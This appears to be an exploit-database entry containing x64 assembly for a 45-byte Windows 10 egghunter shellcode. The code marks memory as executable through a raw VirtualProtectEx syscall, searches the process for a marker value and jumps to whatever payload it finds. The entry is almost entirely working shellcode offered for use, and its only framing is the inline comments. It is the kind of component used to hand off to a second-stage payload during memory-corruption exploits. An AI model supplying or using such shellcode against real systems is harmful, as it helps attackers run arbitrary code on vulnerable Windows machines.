Windows/x64 (10) - Egghunter Shellcode (45 bytes)

Author: Peter Baris
type: 
platform: windows_x86-64
port: 45.0
date_added: 2017-04-06 
date_updated: 2017-04-06 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

PUBLIC Win10egghunterx64

.code

Win10egghunterx64 PROC

_start:
    push 7fh
    pop rdi                               ; RDI is nonvolatile, so it will be preserved after syscalls

_setup:
    inc rdi                                ; parameter 1 - lpAddress - counter
    mov r9b,40h                      ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE
    pop rsi                                ; Stack alignment before the stack setup
    pop rsi
    push rdi
    push rsp
    pop rdx                                ; pointer to lpAddress
    push 08h                            ; parameter 2 - dwSize 0x8
    push rsp
    pop r8                                ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
    mov [rdx+20h],rsp             ; parameter 4 - lpflOldprotect
    dec r10                                ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error
_VirtualProtectEx:

    push 50h                            ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
    pop rax
    syscall

_rc_check:

    cmp al,01h                            ; check the response for non-allocated memory
    jge _setup

_end:                                    ; There won't be too many of these eggs in the memory

    mov eax, 042303042h                    ; the egg
    scasd
    jnz _setup
    jmp rdi

Win10egghunterx64 ENDP
END